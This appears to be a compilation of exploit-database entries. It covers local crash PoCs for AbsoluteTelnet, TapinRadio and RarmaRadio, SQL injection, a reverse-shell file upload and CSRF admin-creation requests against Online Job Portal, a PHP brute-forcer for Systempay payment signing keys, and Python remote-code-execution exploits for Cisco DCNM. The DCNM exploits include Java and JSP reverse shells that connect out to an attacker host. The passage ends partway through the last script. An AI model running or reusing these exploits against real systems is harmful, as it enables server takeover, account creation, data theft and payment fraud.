# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es


#Steps to produce the crash:
#1.- Run python code: AbsoluteTelent 11.12_license_name.py
#2.- Open AbsoluteTelent_license_name.txt and copy content to clipboard
#3.- Open AbsoluteTelnet.exe
#4.- Select "Help"> "Enter License Key"
#5.- In "License Name" paste Clipboard
#6.- Crashed

cod = "\x41" * 2500

f = open('AbsoluteTelent_license_name.txt', 'w')
f.write(cod)
f.close()



# Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
# Discovery by: chuyreds 
# Discovery Date: 2020-02-05
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: AbsoluteTelnet 11.12_username_ssh2.py
#2.- Open absolutetelnet_username_SSH2.txtabsolutetelnet_username.txt and copy content to clipboard
#3.- Open AbsoluteTelnet
#4.- Select "new connection file", "Connection", "SSH2", "Use last username"
#5.- In "username" field paste Clipboard
#6.- Select "OK"
#7.- Crashed

buffer = "\x41" * 1000
f = open ("absolutetelnet_username_SSH2.txt", "w")
f.write(buffer)
f.close()

# Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Tested Version: 2.12.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: tapinadio_address.py
#2.- Open tapin_add.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings"> "Preferences"> "Miscellaneous"
#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
#6.- In Port type "444"> "Username" type "test"> Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

cod = "\x41" * 3000

f = open('tapin_add.txt', 'w')
f.write(cod)
f.close()

# Exploit Title: TapinRadio 2.12.3 - 'username' Denial of Service (PoC)
# Discovery by: chuyreds 
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Tested Version: 2.12.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: tapinadio_user.py
#2.- Open tapin_user.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings"> "Preferences"> "Miscellaneous"
#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
#6.- In Server type "1.1.1.1"> Port type 444  > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

cod = "\x41" * 10000

f = open('tapin_user.txt', 'w')
f.write(cod)
f.close()

# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
# Tested Version: 2.72.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: rarmaradio_username.py
#2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit"> "Settings"> "Network"
#5.- In "Username" field paste Clipboard
#6.- Select "OK"
#7.- Crashed
buffer = "\x41" * 5000
f = open ("RarmaRadio2.72.4_username.txt", "w")
f.write(buffer)
f.close()

# Exploit Title: RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)
# Discovery by: chuyreds 
# Discovery Date: 05-02-2020
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
# Tested Version: 2.72.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
#1.- Run python code: RarmaRadio2.72.4_server.py
#2.- Open RarmaRadio2.72.4_server.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit"> "Settings"> "Network"
#5.- In "Server" field paste Clipboard
#6.- Select "OK"
#7.- Crashed

buffer = "\x41" * 4000
f = open ("RarmaRadio2.72.4_server.txt", "w")
f.write(buffer)
f.close()

# Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# 
curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 282' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
    --data-binary $'user_email=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20VerAyari&user_pass=0x5665724179617269&btnLogin=0x5665724179617269' \
    $'http://localhost/[PATH]/admin/login.php'
# 
HTTP/1.1 200 OK
Date: Wed, 05 Feb 2020 19:18:45 GMT
Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3251
Connection: close
Content-Type: text/html; charset=UTF-8
.............
<!-- /.login-box -->
Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
# 

# POC: 
# 2)
# 
curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 237' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
    --data-binary $'USERNAME=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20verayari&PASS=VerAyari' \
    $'http://localhost/[PATH]/process.php?action=login'
# 
HTTP/1.1 200 OK
Date: Wed, 05 Feb 2020 19:17:19 GMT
Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 167
Connection: close
Content-Type: text/html; charset=UTF-8

Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
#

# Exploit Title: Online Job Portal 1.0 - Remote Code Execution
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# 
curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------1852293616672951051689730436' -H $'Content-Length: 781' -H $'Referer: http://localhost/[PATH]/admin/user/index.php?view=view' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
    --data-binary $'-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"mealid\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a1000000\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"photo\"; filename=\"exp.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0aGIF89c;\x0d\x0a<?php $sock = fsockopen(\'192.168.1.104\',6666);\x0d\x0a$descriptorspec = array(\x0d\x0a0 => $sock,\x0d\x0a1 => $sock,\x0d\x0a2 => $sock\x0d\x0a);\x0d\x0a\x0d\x0a$process = proc_open(\'/bin/sh\', $descriptorspec, $pipes);\x0d\x0aproc_close($process);?>\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"savephoto\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436--\x0d\x0a' \
    $'http://localhost/[PATH]/admin/user/controller.php?action=photos'
# 
curl -i -s -k -X $'GET' \
    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
    $'http://localhost/[PATH]/admin/user/photos/exp.php'
# 
root@ihsan:~/ExploitDB# nc -nlvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 192.168.1.104.
Ncat: Connection from 192.168.1.104:35574.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#

# Exploit Title: Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
# Dork: N/A
# Date: 2020-02-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# Add User..
# 
POST /admin/user/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

user_id=1&deptid=&U_NAME=hacker&deptid=&U_USERNAME=hacker&deptid=&U_PASS=hacker&U_ROLE=Administrator&save=
# 

# POC: 
# 2)
# Edit User..
# 
POST /admin/user/controller.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

user_id=1&deptid=&U_NAME=hacker_edit&deptid=&U_USERNAME=hacker_edit&deptid=&U_PASS=hacker_edit&U_ROLE=Administrator&save=
#

# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force
# Author: live3
# Date: 2020-02-05
# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
# Tested on: MacOs
# Version: ALL

<?php
/**
 * 
 * INFORMATION
 * Exploit Title:        Ecommerce Systempay decode secret production KEY / Brute Force
 * Author:               live3
 * Date:                 2020-02-05
 * Vendor Homepage:      https://paiement.systempay.fr/doc/fr-FR/
 * Tested on:            MacOs
 * Version:              ALL
 * Prerequisite:         Find a ecommerce who is using Systempay AND SHA1 to crypt signature. 
 * Put some product on cart and choose systempay for payment method.
 * get all data from post sent to https://paiement.systempay.fr/vads-payment/
 * keep signature as reference and all vads fields to create new signature.
 * Use script to make a brute force on Secret product key (16 char length)
 *
 * Usage: Once you have the production KEY all modifications on form data will be accepted by systempay ! (You will just generate new signature with your changes)
 * You will be able to generate a success payment return !
 *
 * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
 * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
 * 
 */

// Set the start number you want (16 char length)
$last_key_check = '1000000000000000';

// Assign var
$array_key = array();
$sentence = '';
$how_many_key_to_check_for_loop = 10;

// Put here signature extract from POST DATA
// Example of SHA1 from string : test
$signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3';

// Copy paste your content decoded of POST DATA
$form_data = '
vads_field_1: VALUE1
vads_field_2: VALUE2
// AND ALL OTHER FIELDS...
';

$array = explode(PHP_EOL, $form_data);

foreach ($array as $data) {
    if ($data != '') {
        $elements = explode(': ', $data);
        if (!empty($elements)) {
            $array_key[trim($elements[0])] = $elements[1];
        }
    }
}

ksort($array_key);

foreach ($array_key as $value) {
    $sentence .= $value . '+';
}


echo 'Signature from POST DATA : '.$signature_from_post.'<br/>';

$found = false;
$get_key = '';

// first check
if (sha1($sentence.$last_key_check) != $signature_from_post) {
    for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) {
        $get_key = $i;
        if (sha1($sentence.$i) == $signature_from_post) {
            echo 'Key found : '.$i.'<br/>';
            $found = true;
            break;
        }
    }
} else {
    $found = true;
}


if ($found) {
    $test_sha = sha1($sentence.$get_key);
    echo 'Signature calc : '.$test_sha.'<br/><hr/>';
} else {
    echo 'Last key check : '.$get_key.'<br/><hr/>';
}


echo 'Your sequence : '.$sentence.'<br/>';

#!/usr/bin/python
"""
Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability

Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5

Bug 1: CVE-2019-15975 / ZDI-20-003
Bug 2: CVE-2019-15979 / ZDI-20-100

Notes:
======

Si.java needs to be compiled against Java 8 (the target used 1.8u201):

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Si {
    static{
        try {
            String host = "192.168.100.159";
            int port = 1337;
            String cmd = "cmd.exe";
            Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
            Socket s = new Socket(host,port);
            InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
            OutputStream po = p.getOutputStream(), so = s.getOutputStream();
            while(!s.isClosed()){
                while(pi.available()>0){
                    so.write(pi.read());
                }
                while(pe.available()>0){
                    so.write(pe.read());
                }
                while(si.available()>0){
                    po.write(si.read());
                }
                so.flush();
                po.flush();
                Thread.sleep(50);
                try {
                    p.exitValue();
                    break;
                }catch (Exception e){}
            }
            p.destroy();
            s.close();
        }catch (IOException | InterruptedException e){ }
    }
}

Example:
========

1. Modify the above Si.java to contain your connectback ip and port
2. Compile the above Si.java class with Java 8 and store it in an attacker controlled share
3. Launch the poc.py against your target using the share

saturn:~ mr_me$ ./poc.py 
(+) usage: ./poc.py <target> <connectback:port> <smbserver> <smbpath>
(+) eg: ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'

saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools'
(+) attempting auth bypass 1
(+) bypassed auth! added a global admin hacker:Hacked123
(+) attempting to load class from \\vmware-host\Shared Folders\tools\Si.class
(+) starting handler on port 1337
(+) connection from 192.168.100.122
(+) pop thy shell!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
whoami
nt authority\system

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
"""

import re
import os
import sys
import time
import base64
import socket
import requests
import calendar
import telnetlib
from uuid import uuid4
from threading import Thread
from Crypto.Cipher import AES
from xml.etree import ElementTree
from datetime import datetime, timedelta
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class AESCipher:
    def __init__(self):

        # Cisco's hardcoded key
        self.key = "s91zEQmb305F!90a"
        self.bs = 16

    def _pad(self, s):
        return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)

    def encrypt(self, raw):
        raw = self._pad(raw)
        iv = "\x00" * 0x10
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return base64.b64encode(cipher.encrypt(raw))

def make_raw_token(target):
""" craft our token """
    key = "Source Incite"
    uuid = str(uuid4()).replace("-","")[0:20]
    time = leak_time(target)
    return "%s-%s-%s" % (key, uuid, time)

def bypass_auth(target, token, usr, pwd):
""" we use this primitive to fully bypass auth """
    global user_added_already
    d = {
"userName" : usr,
"password" : pwd,
"roleName" : "global-admin"
    }
    h = { "afw-token" : token }
    uri = "https://%s/fm/fmrest/dbadmin/addUser" % target
    r = requests.post(uri, data=d, headers=h, verify=False)
    try:
        json = r.json()
    except ValueError:
        return False
    if json["resultMessage"] == "Success":
        user_added_already = False
        return True
    elif json["resultMessage"] == "User already exists.":
        user_added_already = True
        return True
    return False

def leak_time(target):
""" leak the time from the server (not really needed) """
    uri = "https://%s/" % target
    r = requests.get(uri, verify=False)
    r_time = datetime.strptime(r.headers['Date'][:-4], '%a, %d %b %Y %H:%M:%S')
    return calendar.timegm(r_time.timetuple())

def gen_token(target, usr, pwd):
""" this authenticates via the SOAP endpoint """
    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.jaxws.dcbu.cisco.com/">'
    soap_body += '\t<soapenv:Header/>'
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:requestToken>'
    soap_body += '\t\t\t<username>%s</username>' % usr
    soap_body += '\t\t\t<password>%s</password>' % pwd
    soap_body += '\t\t\t<expiration>100000</expiration>'
    soap_body += '\t\t</ep:requestToken>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/LogonWSService/LogonWS" % target
    r = requests.post(uri, data=soap_body, verify=False)
    tree = ElementTree.fromstring(r.content)
    for elem in tree.iter():
        if elem.tag == "return":
            return elem.text
    return False

def craft_soap_header(target, usr, pwd):
""" this generates the soap header """
    soap_header  = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
    soap_header += '<m:token xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:token>' % gen_token(target, usr, pwd)
    soap_header += '\t</SOAP-ENV:Header>'
    return soap_header

def load_remote_class(target, smb, usr, pwd):
""" this triggers the cmdi """
    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
    soap_body += craft_soap_header(target, usr, pwd)
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:importTS>'
    soap_body += '\t\t\t<certFile>" -providerclass Si -providerpath "%s</certFile>' % smb
    soap_body += '\t\t\t<serverIPAddress></serverIPAddress>'
    soap_body += '\t\t</ep:importTS>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/SanWSService/SanWS" % target
    r = requests.post(uri, data=soap_body, verify=False)
    tree = ElementTree.fromstring(r.content)
    for elem in tree.iter():
        if elem.tag == "resultMessage":
            if elem.text == "Success":
                return True
    return False

def handler(lp):
    print "(+) starting handler on port %d" % lp
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print  "(+) connection from %s" % addr[0]
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()

def exec_code(t, lp, s, usr, pwd):
    handlerthr = Thread(target=handler, args=(lp,))
    handlerthr.start()
    load_remote_class(t, s, usr, pwd)

def main():
    usr = "hacker"
    pwd = "Hacked123"
    if len(sys.argv) != 5:
        print "(+) usage: %s <target> <connectback:port> <smbserver> <smbpath>" % sys.argv[0]
        print "(+) eg: %s 192.168.100.122 192.168.100.159:1337 vmware-host '\\Shared Folders\\tools'" % sys.argv[0]
        sys.exit(1)
    t = sys.argv[1]
    c = sys.argv[2]
    s = "\\\\%s%s" % (sys.argv[3], sys.argv[4])
    i = 0

    if not ":" in c:
        print "(+) using default connectback port 4444"
        ls = c
        lp = 4444
    else:
        if not c.split(":")[1].isdigit():
            print "(-) %s is not a port number!" % cb.split(":")[1]
            sys.exit(-1)
        ls = c.split(":")[0]
        lp = int(c.split(":")[1])

    # InheritableThreadLocal.childValue performs a 'shallow copy' and causes a small race condition
    while 1:
        i += 1
        print "(+) attempting auth bypass %d" % i
        raw = make_raw_token(t)
        cryptor = AESCipher()
        token = cryptor.encrypt(raw)
        if bypass_auth(t, token, usr, pwd):
            if not user_added_already:
                print "(+) bypassed auth! added a global admin %s:%s" % (usr, pwd)
            else:
                print "(+) we probably already bypassed auth! try the account %s:%s" % (usr, pwd)
            break
        sys.stdout.write('\x1b[1A')
        sys.stdout.write('\x1b[2K')

    # we have bypassed the authentication at this point
    print "(+) attempting to load class from %s\\Si.class" % s
    exec_code(t, lp, s, usr, pwd)

if __name__ == "__main__":
    main()

#!/usr/bin/python
"""
Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability

Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 

Bug 1: CVE-2019-15976 / ZDI-20-008
Bug 2: CVE-2019-15984 / ZDI-20-060

Example:
========

saturn:~ mr_me$ ./poc.py 
(+) usage: ./poc.py <target> <connectback>
(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337

saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
(+) created the account hacker:Hacked123
(+) created the 1337/custom path!
(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c
(+) SQL Injection working!
(+) wrote the si.jsp shell!
(+) cleaned up the database!
(+) starting handler on port 1337
(+) connection from 192.168.100.122
(+) pop thy shell!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
whoami
nt authority\system

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>

Clean Up:
=========

1. delete from xmlDocs where user_name = '1337';
2. delete si.jsp from the web root
3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337
"""

import re
import md5
import sys
import time
import socket
import base64
import requests
import telnetlib
from threading import Thread
from xml.etree import ElementTree
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def _get_jsp(cbh, cbp):
""" get me some jsp for a connectback! """
    jsp = """
<%%@page import="java.lang.*"%%>
<%%@page import="java.util.*"%%>
<%%@page import="java.io.*"%%>
<%%@page import="java.net.*"%%>

<%%
      // clean up
      String[] files = {
"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml", 
"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/",
"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/",
      };
      for (String s:files){ File f = new File(s); f.delete(); }
      File f = new File(application.getRealPath("/" + this.getClass().getSimpleName().replaceFirst("_",".")));
      f.delete();
      class StreamConnector extends Thread
      {
        InputStream we;
        OutputStream uo;

        StreamConnector( InputStream we, OutputStream uo )
        {
          this.we = we;
          this.uo = uo;
        }

        public void run()
        {
          BufferedReader dy  = null;
          BufferedWriter zvi = null;
          try
          {
            dy  = new BufferedReader( new InputStreamReader( this.we ) );
            zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );
            char buffer[] = new char[8192];
            int length;
            while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )
            {
              zvi.write( buffer, 0, length );
              zvi.flush();
            }
          } catch( Exception e ){}
          try
          {
            if( dy != null )
              dy.close();
            if( zvi != null )
              zvi.close();
          } catch( Exception e ){}
        }
      }

      try
      {
        String ShellPath;
        ShellPath = new String("cmd.exe");
        Socket socket = new Socket( "%s", %s);
        Process process = Runtime.getRuntime().exec( ShellPath );
        ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
        ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
      } catch( Exception e ) {}
    %%>
""" % (cbh, cbp)
    return jsp

def get_session(target, user, password):
""" we have bypassed auth at this point and created an admin """
    d = {
"j_username" : user,
"j_password" : password
    }
    uri = "https://%s/j_spring_security_check" % target
    r = requests.post(uri, data=d, verify=False, allow_redirects=False)
    if "Set-Cookie" in r.headers:
        match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,4}:.{44});", r.headers["Set-Cookie"])
        if match:
            sessionid = match.group(1)
            resttoken = match.group(2)
            return { "JSESSIONID" : sessionid, "resttoken": resttoken}
    return False

def craft_soap_header():
    soap_header  = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
    soap_header += '<m:ssoToken xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:ssoToken>' % gen_ssotoken()
    soap_header += '\t</SOAP-ENV:Header>'
    return soap_header

def we_can_trigger_folder_path_creation(target):
""" craft the path location and db entry for the traversal """
    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
    soap_body += craft_soap_header()
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:saveReportTemplate>'
    soap_body += '\t\t\t<reportTemplateName>si</reportTemplateName>'
    soap_body += '\t\t\t<userName>1337</userName>'
    soap_body += '\t\t\t<updatedAttrs></updatedAttrs>'
    soap_body += '\t\t\t<pmInterval>1337</pmInterval>'
    soap_body += '\t\t</ep:saveReportTemplate>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/ReportWSService/ReportWS" % target
    r = requests.post(uri, data=soap_body, verify=False)
    if r.status_code == 200:
        return True
    return False

def we_can_trigger_second_order_write(target, shellpath):
""" trigger the traversal """
